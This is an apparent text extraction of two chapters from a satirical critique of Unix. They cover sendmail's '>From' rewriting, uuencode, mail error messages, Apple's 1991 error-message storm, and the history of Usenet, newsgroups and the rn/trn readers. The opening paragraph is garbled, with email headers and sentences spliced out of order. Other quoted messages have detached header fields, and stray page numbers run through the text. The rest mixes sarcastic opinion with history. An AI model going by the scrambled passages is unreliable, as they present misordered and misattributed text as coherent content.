or putting control information into a separate file.mit.uucp by gorilla.laserlovers. 9 Jun 1988 22:23 EDT pgs@xx.wizards. You can verify this for yourself by sending yourself a mail message containing in the message body a line beginning with “From.lcs.astronomy.” So the mailer has to mutate text lines beginning with “From” so’s not to confuse the mail readers.From: <MAILER-DAEMON@berkeley.sf-lovers.group In your last post you meant to flame me but you clearly don’t know what your talking about when you say > >> %> $> Received: from magilla. so it bears repeating.news.singles.unix. with bizarre characters before each inserted line. is just another file). that angle bracket was put there by the mailer.” This is a very important point.edu UNIX-HATERS mailer warts Did you ever wonder how the Unix mail readers parse mail files? You see these crufty messages from all these losers out in UUCP land. but no.lobotomies. you might think it had something to do with the secret codes that Usenet Unix weenies use when talking to each other. or putting a .soc. and they always have parts of other messages inserted in them. Like this: From Unix Weenie <piffle!padiddle!pudendum!weenie> Date: Tue. Instead of using a special control sequence. you see. 13 Feb 22 12:33:08 EDT From: Unix Weenie <piffle!padiddle!pudendum!weenie> To: net. to indicate that they're actually quoting the fifteenth preceding message in some interminable public conversation.uucp > >> %> $> via uunet with sendmail > >> %> $> … so think very carefully about what you say when you post >From your home machien because when you sent that msg it went to all the people who dont want to read your falming so don’t do it ):-( Now! Why does that “From” on the second line preceding paragraph have an angle bracket before it? I mean. The mail reading program parses mail files by looking for lines beginning with “From. following the Unix design. The reason for “>From” comes from the way that the Unix mail system to distinguishes between multiple e-mail messages in a single mailbox (which.edu> 79 Date: From: To: Subject: Thu.
So what happens when you complain to a vendor of electronic mail services (whom you pay good money to) that his machine doesn’t follow protocol—what happens if it is breaking the law? Jerry Leichter complained to his vendor and got this response: Date: From: To: Subject: Tue.80 Mail special header at the beginning of the mail file. Yet internal mail gets goosed with those “>Froms” all over the place. For this reason.” Springer-Verlag. pages 622–640. Using bits that might be contained by e-mail messages to represent information about e-mail messages is called inband communication. For example. Why? Because on its hop from one DOS box to another. For example. and anybody who has ever taken a course on telecommunications knows that it is a bad idea. Look at pages 626.com> UNIX-HATERS That wonderful “>From” <A customer service representative>5 From: . Sendmail even mangles mail for which it isn’t the “final delivery agent”— that is. and 636—three paragraphs start with a “From” that is prefixed with a ¿.” Now. Different text preparation systems do different things with the “>” character. 430. you might think this is a harmless little behavior. Unix assumes that any line beginning with the letters F-r-o-m followed by a space (“ ”) marks the beginning of a new mail message. 24 Mar 92 22:59:55 EDT Jerry Leichter <leichter@lrw. If you don't believe us. obtain the paper “Some comments on the assumptioncommitment framework for compositional verification of distributed programs” by Paritosh Pandya. LaTeX turns it into an upside question mark (¿). The reason that inband communication is bad is that the communication messages themselves sometimes contain these characters. mail destined for some other machine that is just passing through some system with a sendmail mailer. so it gets printed verbatim. like someone burping loudly in public. 630. But sometimes those burps get enshrined in public papers whose text was transmitted using sendmail. sendmail searches out lines that begin with “From ” and changes them to “>From. just about everyone at Microsoft uses a DOS or Windows program to send and read mail. mail passes through a Unix-like box and is scarred for life. The recipient believes that the message was already proofread by the sender. Lecture Notes in Computer Science no. in “Stepwise Refinement of Distributed Systems.
“>From” distortion can’t occur to such a file. since it doesn’t specifically say you can’t do it. . It makes it clear that messages are to be delivered unchanged. wherever they might have come from. which nowhere justifies a mail forwarding agent modifying the body of a message—it simply says that “From” lines and “>From” lines. Uuencode encodes a file that uses only 7-bit characters. I think I need to scream. Nothing about >’s. Those in the middle levels know about >From lossage but think that uuencode is the way to avoid problems. but because there was no reason to single out this particular company: the notion that “sendmail is always right” is endemic among all of the Internet service providers. I have sent test messages from machines running the latest software. Unix mailers have other ways of screwing users to the wall: 5 This message was returned to a UNIX-HATER subscriber by a technical support representative at a major Internet provider. The program uudecode decodes a uuencoded file to produce a copy of the original file. for example. and not only is it still wrong—at a commercial system that charges for its services—but those who are getting it wrong can’t even SEE that it’s wrong. instead of 8-bit characters that Unix mailers or network systems might have difficulty sending. Here we are 10 years later. are members of the syntactic class From_Lines. If you can come up with an RFC that states that we should not be doing this I’m sure we will fix it. Another Failure You can tell those who live on the middle rings of Unix Hell from those on lower levels. As my final note.From: <MAILER-DAEMON@berkeley. As I said before. it appears it is Unix’s way of handling it.edu> 81 I don’t and others don’t think this is a bug. uuencode: Another Patch. We’ve omitted that company’s name. Until then this is my last reply. it must be legal. Unfortunately. I have brought this to the attention of my supervisors as I stated before. A uuencoded file is supposedly safer to send than plain text. here is a section from rfc976: [deleted] I won’t include that wonderful quote. right? I recently dug up a July 1982 RFC draft for SMTP. not in the interest of protecting the guilty. with certain documented exceptions. and it mentions that such lines exist. Using typical Unix reasoning.
hk> UNIX-HATERS Need your help.hku. And I really. Maybe it’s Unix fighting back.... which knows about creating files. No way. User unknown: Not a typewriter 550 <bogus@ASC. User unknown: Address already in use . and so forth.” I particularly admire the way uuencode insists on creating a file for you. and re-pad with blanks—that will (almost certainly?) fix it up. Someone mailed him a uuencoded PostScript version of a conference paper. but this precise bug hit one of the editors of this book after editing in this message in April 1993. Strings of nuls map to strings of blanks. what did you expect? Of course you can grovel over the data. Many Unix mailers thoughtfully strip trailing blanks from lines of mail.SLB. find the lines that aren’t the right length. Well. The idiot program uses ASCII spaces in its encoding. and directories. Shivers” <shivers@csd.COM>. Error Messages The Unix mail system knows that it isn’t perfect. What else is your time for anyway. it’s Unix. we build a half-baked equivalent functionality directly into uuencode so it’ll be there whether you want it or not. and it is willing to tell you so. Instead of piping into tar. In the man page? Hah. really like the way uuencode by default makes files that are world writable. Anybody who thinks that uuencode protects a mail message is living in a pipe dream. Go read the source—that’s the “spec. and file permissions.82 Mail Date: From: To: Subject: Tue. Uuencode doesn’t help. This nukes your carefully–encoded data.. instead of working as a stdio filter. 4 Aug 92 16:07:47 HKT “Olin G. besides cleaning up after the interactions of multiple brain-damaged Unix so-called “utilities?” Just try and find a goddamn spec for uuencoded data sometime. But it doesn’t always do so in an intuitive way. Here’s a short listing of the error messages that people often witness: 550 chiarell. and fully 12 lines had to be handpatched to put back trailing blanks before uudecode reproduced the original file.
unknown mailer error 1 554 “| filter -v”.msg file with a message in it. 59 messages already.edu> UNIX-HATERS the vacation program So I went to a conference the week before last and decided to try being a Unix weenie.” Date: From: To: Subject: Tue. A test message..) There is also some -l initialization option. Nothing was wrong with mail systems until Unix came along and broke things in the name of “progress. I should have known better. a quick peek at the mail box. Unix zealots who think that mail systems are complex and hard to get right are mistaken. which I couldn’t get to work. . We figure that the error message “not a bicycle” is probably some system administrator’s attempt at humor.. a . etc. It must be working.edu> 83 550 zhang@uni-dortmund. I decided to test it by sending myself a message. and it won’t send a message with just a subject line. The message “Too many recipients for no message body” is sendmail’s attempt at Big Brotherhood. and set up a “vacation” message.washington. unknown mailer error 1 554 Too many recipients for no message body “Not a typewriter” is sendmail’s most legion error message.de. It thinks it knows better than the proletariat masses.vacation..forward file with an obscure incantation in it..From: <MAILER-DAEMON@berkeley. Well. bingo. User unknown: Not a bicycle 553 abingdon I refuse to talk to myself 554 “| /usr/new/lib/mh/slocal -user $USER”. and work highly reliably.. which is supposed to keep the vacation replies down to one per week per sender. The vacation program has a typical Unix interface (involving creating a . The conclusion is obvious: you are lucky to get mail at all or to have messages you send get delivered. Mail used to work. 9 Apr 91 22:34:19 -0700 Alan Borning <borning@cs. thinking that surely they would have allowed for this and prevented an infinite sending of vacation messages..
a message might be delivered by the grace of some god or royal personage—but never by the grace of Unix. Allman then goes on to note that “A major component of reliability is the concept of responsibility. Eric Allman writes that sendmail is phenomenally reliabile because any message that is accepted is eventually delivered to its intended recipient. sent to the root user. or. sent to the system’s postmaster. Apple Computer’s Mail Disaster of 1991 In his 1985 USENIX paper.berkeley. the really irksome thing about this program is the standard vacation message format. returned to the original sender.edu (Eric Allman) Subject: I am on vacation Delivered-By-The-Graces-Of: the Vacation program … Depending on one’s theology and politics. logged to a file.84 Mail However.” He continues: . The very concept is an oxymoron. From the man page: From: eric@ucbmonet. in absolute worst case.
This is normally not a catastrophic event.Apple Computer’s Mail Disaster of 1991 85 For example.. It is interconnected with the Internet in three places: two in the Silicon Valley. were known and understood in 1983 when sendmail was written.. before sendmail will accept a message (by returning exit status or sending a response code) it insures that all information needed to deliver that message is forced out to the disk. even for processes running on two separate computers.000 users every day. if lost after acceptance. Certainly. 6 Erik Fair graciously gave us permission to reprint this message which appeared on the TCP-IP. and RISKS mailing lists. it is the “fault” of the sender. Fair”6 (Your Friendly Postmaster) <fair@apple. Japan.S. If the message is lost prior to acceptance. Date: From: To: Subject: Thu. This design choice to deliver two copies of a message rather than none at all might indeed be far superior in most circumstances. and 40 buildings in the Silicon Valley. it’s my problem. When things go wrong with e-mail on this network. and is far superior to losing a message. unicode@sun. The Apple Engineering Network has about 100 IP subnets. and one in Boston. It stretches from Tokyo. although he added: “I am not on the UNIX-HATERS mailing list.ddn.com. Sun. atomic operations.] Case of the Replicated Errors: An Internet Postmaster’s Horror Story This Is The Network: The Apple Engineering Network.” . If a failure occurs during this window then two copies of the message will be delivered. I just hate USL. It supports almost 10. 09 May 91 23:26:50 -0700 “Erik E. I do not hate Unix. I have never sent anything there personally. and all the other vendors who have made Unix FUBAR. it is the “fault” of the receiving sendmail. In this way. My name is Fair. 224 AppleTalk zones. UNICODE. [.mil. to Paris. On the other hand. techniques for guaranteeing synchronous. lost mail is a bad thing.. and over 600 AppleTalk networks. This algorithm implies that a window exists where both sender and receiver believe that they are “responsible” for this message. I carry a badge. sendmail has “accepted responsibility” for delivery of the message (or notification of failure).com> tcp-ip@nic. France. HP. with half a dozen locations in the U.
It was early evening.com.” but you can bet your cookies that most of them were running Unix.500 QuickMail users on the Apple Engineering Network. One such 7 Erik identifies these machines simply as “Internet hosts. a popular Macintosh based e-mail system from CE Software. The gateway that we installed for this purpose is MAIL*LINK SMTP from Starnine Systems. and RFC821 SMTP as our common intermediate r-mail standard. from QuickMail. Many of our users subscribe. I also found 2. . our VAX-8650. It does gateway duty for all of the 3. and we gateway everything that we can to that standard.000+ copies of this error message already in our queue. to promote interoperability. had climbed way out of its normal range to just over 72. In order to make it possible for these users to communicate with other users who have chosen to use other e-mail systems. While I was reading my e-mail that evening. ECO supports a QuickMail to Internet e-mail gateway. to Internet mailing lists which are delivered to them through this gateway. on a Monday. Upon investigation. I immediately shut down the sendmail daemon which was offering SMTP service on our VAX. The names have not been changed so as to finger the guilty. I was working the swing shift out of Engineering Computer Operations under the command of Richard Herndon. I examined the error message. and reconstructed the following sequence of events: We have a large community of users who use QuickMail.86 Mail [insert theme from Dragnet] The story you are about to read is true. I noticed that the load average on apple. This product is also known as GatorMail-Q from Cayman Systems. I found that thousands of Internet hosts7 were trying to send us an error message. I don’t have a partner. We use RFC822 Internet mail format.
Davis. but I’ve heard from Postmasters in Sweden. without a matching “>” character. Note that this syntax error in the “To:” field has nothing whatsoever to do with the actual recipient list.Apple Computer’s Mail Disaster of 1991 87 user. —Eds. which is handled separately. He composed a one paragraph comment on the original message. AND delivers the original message onward to whatever specified destinations are listed in the recipient list. every host on the Internet (all 400. he replied to a message that he received from the mailing list. I have often dreaded the possibility that one day. Sometime on Monday. all at once. .000 hosts. we got a taste of what that must be like. This is deadly.000 of them8) would try to send us a message. The effect was that every sendmail daemon on every host which touched the bad message sent an error message back to us about it. because it interacted with a bug in sendmail.com mailing list. This minor point caused the massive devastation. and over to Sun Microsystems. The message made it out of the Apple Engineering Network. Japan. On Monday. and which. Korea. Sendmail.000. in this case. either QuickMail or MAIL*LINK SMTP mangled the “To:” field of the message. to discuss some alternatives to ASCII with the other members of that list. doesn’t like “To:” fields which are constructed as described. arguably the standard SMTP daemon and mailer for UNIX.com mailing list. is on the unicode@sun.com mailing list. was perfectly correct. I don’t know how many people are on the unicode@sun. Aus8 There are now more than 2. Somewhere in the process of that reply. and hit the “send” button. The important part is that the “To:” field contained exactly one “<” character. Mark E. What it does about this is the real problem: it sends an error message back to the sender of the message. where it was exploded out to all the recipients of the unicode@sun.
Our secondary MX is the CSNET Relay (relay. They eventually destroyed over 11. She wanted to know what had hit her machines. I also heard from CSNET that UUNET.cs. and all over the U. The versions of sendmail with this behavior are still out there on hundreds of thousands of computers. and deliver it to us in an orderly fashion. I speculate that the list has at least 200 recipients.com and delivered a copy of that error message. but I’m still spending a lot of time answering e-mail queries from postmasters all over the world. Their postmistress was at wit’s end when I spoke to her. .com because we were overloaded from all the mail. I destroyed about 4.cs. and so they contacted the CSNET Relay instead. waiting for another chance to bury some unlucky site in error messages.88 Mail tralia. After I turned off our SMTP daemon.net). had destroyed 2. rather than have every host which has a message for us jump on us the very second that we come back up. there were three hosts which couldn’t get ahold of apple. and about 25% of them are actually UUCP sites that are MX’d on the Internet. The final chapter of this horror story has yet to be written. our secondary MX sites got whacked.S. someone else will collect our mail in one place. This instantiation of this problem has abated for the moment. I replaced the current release of MAIL*LINK SMTP with a beta test version of their next release. France. yet. It has not shown the header mangling bug. The next day. I presume that their modems were very busy delivering copies of the error message from outlying UUCP sites back to us at Apple Computer.net and relay2.000 copies of the error message. It seems that for every one machine that had successfully contacted apple.000 copies of the error message in our queues here at Apple Computer. We have a secondary MX site so that when we’re down. Britain.000 copies of the error message in the queues on the two relay machines. a major MX site for many other hosts.
Apple Computer’s Mail Disaster of 1991 89 Are you next? [insert theme from “The Twilight Zone”] just the vax. Erik E. ma’am.com . Fair fair@apple.
92 .
This trash is known.5 Snoozenet I Post. the messages were stored in a public area where everyone could read them. collectively. two graduate students in North Carolina set up a telephone link between the machines at their universities (UNC and Duke) and wrote a shell script to exchange messages. Netnews and Usenet: Anarchy Through Growth In the late 1970s. shipping around untold gigabytes a day of trash. a dung heap. Townson We’re told that the information superhighway is just around the corner. we already have to deal with the slow-moving garbage trucks clogging up the highway’s arteries. as Usenet. These trash-laden vehicles are NNTP packets and compressed UUCP batches. Posting a message at any computer sent a copy of it to every single system on the fledgling network. Unlike mail. .” —Patrick A. Nevertheless. Therefore I Am “Usenet is a cesspool.
94 Snoozenet The software came to be called “news. who may be known to some of you. Every time a new site came on the network. Capacity increased and Usenet truly came to resemble a million monkeys typing endlessly all over the globe. and from that came “Usenet. Defenders of the Usenet say that it is a grand compact based on cooperation.edu Splitting BandyHairs on LuseNet VOID. propagating the virus.6 million users generating 43.mit. a group of hackers devised a protocol for transmitting Usenet over the Internet.ca. more people. FEATURE-ENTENMANNS.000 sites with 4. and letter-bombs. Around that time. Observe: Date: From: Subject: To: Fri.berkeley. bulking up the massive spending on computers in the 1980s. UNIX-HATERS The news. 1 From A Fire Upon the Deep by Vernor Vinge (Tom Doherty Associates. . this was the source code to the news software itself.” and “Net of a Million Lies. What they don’t say is that it is also based on name-calling.admin newsgroup has recently been paralyzed (not to say it was ever otherwise) by an extended flamefest involving one bandy@catnip. The exorbitant costs were easily disguised as overhead. 1992). which was completely subsidized by the federal deficit. Mostly.us.” “Snoozenet. In early 1994. harassment.”1) The network grew like kudzu—more sites. there were an estimated 140. Death by Email How does a network based on anarchy police itself? Mob rule and public lynchings. 10 Jul 92 13:11 EDT nick@lcs. One computer in New Hampshire was rumored to have a five-digit monthly phone bill before DEC wised up and shut it down. every message posted by everybody at that site was automatically copied to every other computer on the network. Over time the term “netnews” came into use.” “Lusenet. and more messages.” and its legions of mutilations (such as “Abusenet.” because the intent was that people (usually graduate students) at most Unix sites (usually universities) would announce their latest collection of hacks and patches.000 messages a day. The basic problem with Usenet was that of scaling.
. And has paid dearly for his rashness.admin: People who have known the perp (God.cascade. He's been punished enough. impulsive in the past. nugget of idiocy. Most of us just add the perpetrator ("perp" in the jargon) to our kill files. . Someone cleverly forwarded his message from nntp-managers to news... you mean sitting in a bathtub yelling "Be careful with that X-Acto blade!" isn’t punishment enough? For anything?) Some say that sordid episode should remain unchronicled (even by the ACM -. well. Regrettably. the steely clashes of metaphor upon metaphor are music to the ears of the true connoisseur of network psychology. (What. the screams of “Free speech!” and “Lynch Mobs!” are deafening. and terminating exdent is evidently favored by certain typographically-impaired people. All in all. He admitted his mistake in a message sent to the nntp-managers mailing list (what remains of the UseNet “cabal”) but calls for him to “publicly apologize” continue to reverberate. A “cascade” is an affectionate term for a sequence of messages quoting earlier messages and adding little or no content.wisdom before anyone could turn it off. the resulting repeated indent. and someone (doubtless attempting to prevent possible sendsys bombing of that address) began cancelling all articles which mentioned the address… Ah.especially by the ACM) . I hate that word) also know that he's been .02: Newsgroups: news. Bandy’s implementation of this (arguably worthy) idea contained a not-so-subtle bug that caused it to begin cancelling articles that were not cascades.. I am sorry to (publicly) admit that I succumbed to the temptation to throw in my $.admin (which contained his net address). he attempted to reduce the amount of noise on Lusenet by implementing a program that would cancel articles crossposted to alt.Netnews and Usenet: Anarchy Through Growth 95 Apparently. But as long as we’re wasting time and bandywidth here on news. and it deep-sixed about 400 priceless gems of net.admin Subject: Splitting BandyHairs Distribution: world I’m glad we have nntp-managers for more-or-less reasonable discussion of the problems of running netnews. a classic example of Un*x and UseNet lossage: idiocy compounded upon idiocy in an ever-expanding spiral.
A newsgroup is a period-separated set of words (or common acronyms or abbreviations) that is read from left to right. and you can spread the infection.” In written messages.ammatilliset.organomet is for discussion of organometallic chemistry.chef.vampire. Usenet is international. you pronounce the first period in the names so that “comp.oppisopimus.oppimiskeskus. For example. they sort of figured out the pattern.”) One section of Usenet called “alt” is like the remainder bin at a book or record store. One look at news. so a discussion about comp. we haven’t said how you can tell if a computer system is or isn’t a part of it.u. The best definition might be this: if you receive some newsgroups somehow. —nick Newsgroups So far we haven’t actually said what Usenet is. or sometimes the top-level hierarchy.whine. For example.bork. or the open shelf section of a company library—you never know what you might find.sources. then you’re a part of Usenet. What’s a newsgroup? Theoretically.admin and you'll instantly understand why it's mostly a waste of time.andy. and you can now find the following on some sites: alt. a fan of the Muppets with a puckish sense of humor once created alt. Once again. the virus analogy comes to mind: once you touch it.whine .foo” is pronounced “comp-dot-foo.bork. That’s because nobody really can say.freenet. As is typical with Unix weenies. None of LuseNet is cast in concrete. that is.bork.chem.96 Snoozenet People complain about "lazy or inattentive sysadmins". and while most groups have English names.swedish.alien. newsgroups are the Dewey Decimal System of Usenet. though Bandy has been plastered.flonk.consumers. users may bump into gems like finet.flonk. whatever that is. (By the way. Let you who is without sin cast the first stone.unix might use the term “c. the name parts are often abbreviated to a single letter when the context is clear. misc.house is the newsgroup for discussions about owning or buying a house and sci. and if you can write messages that others can read.flonk alt.whine. you’re infected.s. and it rarely has value. The left-most part of the name is called the hierarchy.
which had real computers running real operating systems.die. At the top rung were the 2 The first crawls.die. the moderator added a header that said “Approved” with some text. Hurling Hierarchies Usenet originally had two hierarchies.folk” or “net. anyone can forge articles in moderated groups. Not that that stops anyone on the Usenet.biff.breakdown. or prolific postings were called net.2 The term “net” cropped up in Usenet discussions.sucks.biff. and then repost it.die alt. The everyday people. People well known for their particularly insightful. a national mailing list that was rapidly taking over all of MC’s night cycles. they could be considered among the first hesitant crawls onto the information superhighway.american.bob-packwood. obnoxious.dinosaurs. The “fa” stood for from ARPANET and was a way of receiving some of the most popular ARPANET mailing lists as netnews. The origins of the term “net” are lost.bork.tv. if only because it is so easy to do so: there is little challenge in breaking into a safe where the combination is written on the door. of course.bork alt. typically the moderator’s address.automobile. occured on the ARPANET.tongue.barney. .personalities. called “net.Newsgroups 97 alt.tongue. Of course. The “fa” groups were special in that only one site (an overloaded DEC VAX at UCB that was the computer science department’s main gateway to the ARPANET) was authorized to post the messages. trying to save his hide. Moderated groups were the first close integration of mail and news. the joke wears thin rather quickly.breakdown.tongue alt. occupied the lowest rung.sucks alt.denizens.bork. where “mod” stood for moderated.sucks. To repost. so a later release of the Usenet software renamed the fa hierarchy to mod. check it out to some degree.” who mostly read and occasionally posted articles. and an informal caste system developed. breakdown As you can see. This concept became very useful. The software was changed to forward a message posted to a moderated group to the group’s “moderator” (specified in a configuration file) who would read the message. the users of MIT-MC. were ready to lynch Roger Duffey of the Artificial Intelligence Laboratory for SF-LOVERS. MIT’s largest and fastest KL-10. Ever wonder where the “list-REQUEST” convention and digestification software came from? They came from Roger.tv. Before netnews exploded. This does not happen too often. net and fa.90210.
net. they often exceeded the built-in limits of the Unix tools that manipulated them.gods were often aloof.) Political. He studied the list of current groups and. the software would once again have to be changed. religious. etc. (A typical summary of net.) Recreational discussion (TV. in turn. software. and issue-oriented discussion Social issues.) Users protested that it would be too easy . etc. which. required very long lines in the configuration files. since.abortion might be “abortion is evil / no it isn’t / yes it is / science is not evil / it is a living being / no it isn’t…” and so on. The proposed change was the topic of some discussion at the time. less frequently.wizards who had exhaustive knowledge of the newgroup’s subject. etc. (That’s a Usenet truism: EVERYTHING is a topic of discussion at some time. The Great Renaming As more sites joined the net and more groups were created. like a modern day Linnaeus. They often withdrew from Usenet participation in a snit and frequently seemed compelled to make it a public matter. the net/mod scheme collapsed.) Discussion of Usenet itself Scientific discussion (chemistry.” the group name would no longer indicate how articles were posted. A receiving site that wanted only the technical groups forced the sending to explicitly list all of them. net. either because they helped write the Usenet software or because they ran an important Usenet site.) Of course. In the early 1980s Rick Adams addressed the situation. Most people didn’t care. they could also be jealous and petty as well. Net. refusing to answer (for the umpteenth time) questions they knew cold.gods and. categorized them into the “big seven” that are still used today: comp news sci rec talk soc misc Discussion of computers (hardware.98 Snoozenet net. but that was okay: Rick had also become its maintainer. sports.” Many of the “high-volume/low-content” groups were put into talk. Like the gods of mythology. to a reader they all look the same.gods could also be those who could make big things happen. Not surprisingly (especially not surprisingly if you’ve been reading this book straight through instead of leafing through it in the bookstore). A bigger topic of discussion was the so-called “talk ghetto. such as culture Everything else Noticeably absent was “mod.
it started with sites in the San Francisco Bay Area. who reviewed them and posted them in a consistent format. people now complain if the postings don’t contain “official” . Scandinavia did not care to read about—let alone participate in—discussion of Roe v. the Usenet cookbook didn’t appear in rec. say. In these rude and crude times. Wade. that hotbed of 1960s radicalism and foment. As you might expect.aquaria.” Alt. John Gilmore didn’t like the absence of an unmoderated source group—people couldn’t give away code. Brian and John got together with some other admins and created the “alt. short-term Unix-style patch.food. Perhaps he went on a diet? As for alt. and even though the users objected. After a flamefest regarding the disposition of the newsgroup for the care and feeding of aquaria.gourmand became “rec.gourmand and alt. It went surprisingly smoothly. Of course—that was the point! At the time most of Europe was connected to the United States via a longdistance phone call and people in.” for alternative. hierarchy. it had to go through a middleman.gourmand fairly rapidly.sources were created. typeset.flamage At the time for the Great Renaming. software at major net sites silently rewrote articles to conform to the new organization. The major rule in “alt” is that anyone may create a group and anarchy (in the truest sense) reigns: each site decides what to carry. you’re more likely to see the terms like “net. Brian Reid had been moderating a group named “mod.massive. Terms like “net.food.jerk.) For people who didn’t agree. Over 500 recipes were published. So. alt.Alt. Usenet was controlled by Unix-thinking admins.massive.flamage 99 for an administrator to drop those groups. mostly accomplished in a few weeks. Even though this appeared to be yet another short-sighted. and index the recipes thereby creating a group personal cookbook—the ultimate vanity press.recipes” and Brian hated that prosaic name. The name overhaul is called the Great Renaming. albeit primarily by older hands. two groups sprouted up—sci.aquaria and rec. however.gourmand. He also provide scripts to save.god” are still used. (It wasn’t clear where everything should go. Usenet had become a slow-moving parody of itself.sources. so the changes happened. mod.recipes and Brian quit moderating alt.” People from around the would sent their favorite recipes to Brian. Under the new scheme. As a case in point.
the value of the messages inevitably drops. Makefiles. but about sociology. Meanwhile.. alt. then as posters. A necessary but. Without a moderator or a clearly stated and narrow charter such as many of the non-alt newsgroups have. fundamentally. Am not.aquaria have given more forums for aquarium-owners to congregate. at least. Usenet access. the result would be the same: A resounding confirmation of Sturgeon’s Law. The result is a polarization of newsgroups: those with low traffic and high content. Most of the posters are male science and engineering undergraduates who rarely have the knowledge or maturity to conduct a public conversation.sources has become a clone of the moderated groups it sought to bypass. As the quality newsgroups get noticed.aquaria and alt. we’ve recited history without any real criticisms of Unix. the new group is as bad as the old. Unless they take special care to . which states that 90% percent of any field is crap. Alt. computer literate beings) into six-year olds whose apogee of discourse is “Am not.clearing. and those with high traffic and low content. more importantly.) They also have far too much time on their hands. (It turns out that comparatively few women post to the Usenet.. The original members of the new group either go off to create yet another group or they create a mailing list. Are so. and so on.” The demographics of computer literacy and. bringing all discussion down to the lowest common denominator. Newsgroups with large amounts of noise rarely keep those subscribers who can constructively add to the value of the newsgroup. Even if Unix gave users better technology for conducting international discussions.. are responsible for much of the lossage. the anonymity of the net reduces otherwise rational beings (well.100 Snoozenet archive names. unfortunately. those who do are instantly bombarded with thousands of “friendly” notes from sex-starved net surfers hoping to score a new friend. Without this simple condition. not sufficient condition for a decent signalto-noise ratio in a newsgroup is a moderator who screens messages. This Information Highway Needs Information Except for a few jabs at Unix. Usenet parodies itself. Why have we been so kind? Because. Usenet is not about technology. Are so. more people join— first as readers. The polarization is sometimes a creeping force. descriptions. After a few flame fests.
These programs. visible inspection can’t distinguish between the two. 09 Jan 1992 01:14:34 PST Mark Lottor <mkl@nw. This could cause problems if rn wasn’t careful about “Tricky” subjects. and. it also reads the killfile that you created for that group (if it existed) that contains lines with patterns and actions to take. if someone wanted to read only announcements but not replies. trn: You Get What You Pay for 101 keep the list private (e. they’re sort of similar to shell patterns. the poor author doesn’t stand a chance in hell of being able to write code that will “just work” on all modern Unices. unfortunately. you can even turn the reason around on its head and explain why this is a virtue of giving out the source. and the vicious circle repeats itself. by not putting it on the list-of-lists). were so simplistic that they don’t bear further discussion.” rn shifted the paradigm of newsreader by introducing killfiles..*/” in the killfile. This policy is largely a matter of self-preservation on the part of the authors: • It’s much easier to let other people fix the bugs and port the code. • Even if you got a single set of sources that worked everywhere. different Unix C compilers and libraries would ensure that compiled files won’t work anywhere but the machine where they were built. The early versions of Usenet software came with simple programs to read articles. the programs that people use to read (and post) news are available as freely redistributable source code. Date: From: To: Subject: Thu. the list will soon grow and cross the threshold where it makes sense to become a newsgroup. The most popular newsreader may be rn. (Of course. The patterns are regular expressions. they could put “/Re:. trn: You Get What You Pay for Like almost all of the Usenet software. rn. rn’s documentation claimed that “even if it’s not faster. it feels like it is. called readnews and rna. written by Larry Wall. For example.rn. Each time rn reads a newsgroup. • Unix isn’t standard.g.com> UNIX-HATERS rn kill .) Killfiles let readers create their own mini-islands of Usenet within the babbling whole.
I watch the header pop up. This said: here’s how my fixed code is different from your broken code.” Like all programs. read news articles over a network.. the latest version of rn. which is a fundamental problem. and you can’t use “m” for mail because that means “mark the article as unread. but that means send reply directly to the author by sending mail. You can’t use “s” for mail because that means save to a file. Remote rn. Larry introduced the idea of distributing fixes using a formalized message containing the “diff” output. and type “k. the help information is never complete. For example: . and what does followup mean. This says “marking subject <foo> as read” and marks all unread messages with the same subject as having been read. and if the subject isn’t interesting I type “k” for the kill command. Every time Larry put out an official patch (and there were various unofficial patches put out by “helpful” people at times). a variant of rn. Total lossage. No way to undo it. anyway? One would like to use “r” to post a reply. and trn shows the “tree” by putting a little diagram in the upper-right corner of the screen as its reading. I see a message pop up with subject "*******". who can really remember the difference between “k”. which massages the old file and the description of changes into the new file. and because everyone sounded like a seal when they said the name. “it certainly seems faster. trn.^K”. rn has had its share of bugs. A thread is a collection of articles and responses.” And who can decipher the jargon to really know what that means? Or. On the other hand. has merged in all the patches of rn and rrn and added the ability to group articles into threads. Larry also wrote patch. It’s interesting only because it required admins to keep two nearly identical programs around for a while. “^K”.102 Snoozenet I was just trying to catch up on a few hundred unread messages in a newsgroup using rn.” Yep—it marks ALL messages as being read. Since there are many commands some of the assignments make no sense. and there is no scripting language. Screwed again. “. “K”.. —mkl rn commands are a single letter. sites all over the world applied the patch and recompiled their copy of rn. rrn. So what happens. and so on? There is no verbose mode. Why does “f” post a followup.
we don’t know what it means either. 27 Sep 91 16:26:02 EDT Robert E. but no domain name.group.edu> UNIX-HATERS rn bites weenie So there I was. The rn family is highly customizable. Moveover.Name. this article that I wanted to keep had direct relevance to what I do at work. We have a UUCP connection to uunet (a source of constant joy to me.uu. you can mail it to yourself or some other lucky person by typing “| mail jrl@fnord. Thus.. RN has this handy little feature that lets you pipe the current article into any unix program.rn. but that's another flame. ~/News. because when I went to read my mail several hours later.org” at the same prompt. I found this in my mailbox: Date: Fri. On the other hand. when I ran across an article that I thought I'd like to keep..name There are times when this capability (which had to be shoehorned into an inflexible environment by means of “% strings” and “escape sequences”) reaches up and bites you: Date: From: To: Subject: Fri. so I wanted to mail it to myself there. trn: You Get What You Pay for 103 +[1]-[1]-(1) \-[2]-[*] | +-[1] +-[5] +[3] -[2] No. so you could print the article by typing “| lpr” at the appropriate time.). only the true anal-compulsive Unix weenie really cares if killfiles are stored as $HOME/News/news/group/name/KILL.net (Mail Delivery Subsystem) .mit.Group. wasting my time reading abUsenet news. $DOTDIR/K/news. Seastrom <rs@ai.uu. but there are Unix weenies who swear by diagrams like this and the special nonalphabetic keystrokes that “manipulate” this information. 27 Sep 91 10:25:32 -0400 From: MAILER-DAEMON@uunet. Now.” Apparently %d means something special to rn. I sent it to “rs%deadlock@uunet.net.
so that people there could see that the question had been answered. so it made sense to post an answer to someone’s question. surprisingly. Austin In the early days of Usenet.uu..uu. a posting could take a week to propagate throughout most of the net because. User unknown —Rob When in Doubt.uu. As a result. Usenet is much faster now. E-mail was often unreliable. Usenet discussions often resembled a cross between a musical round-robin and the children’s game of telephone. Those “early on” in the chain added new facts and even often moved on to something different. The software is partly to blame—there’s no good way to easily find out whether someone has already answered the question. Free advice is worth what you pay for it. They are often contradictory and many are wrong. the humans haven’t kept up with the technology. . it can reach hundreds of sites in five minutes. typically. ma. but that’s to be expected. each long hop was done as an overnight phone call. if you’re on the Internet. Post I put a query on the net I haven’t got an answer yet. —Ed Nather University of Texas. while those at the end of the line would recieve messages often out of order or out of context. You can post an article and. There was also the feeling that the question and your answer would be sent together to the next site in the line. to reduce volume..net> <<< 550 <rs/tmp/alt/sys/suneadlock@uunet. People see an article and feel the rush to reply right away without waiting to see if anyone else has already answered.Transcript of session follows ---->>> RCPT 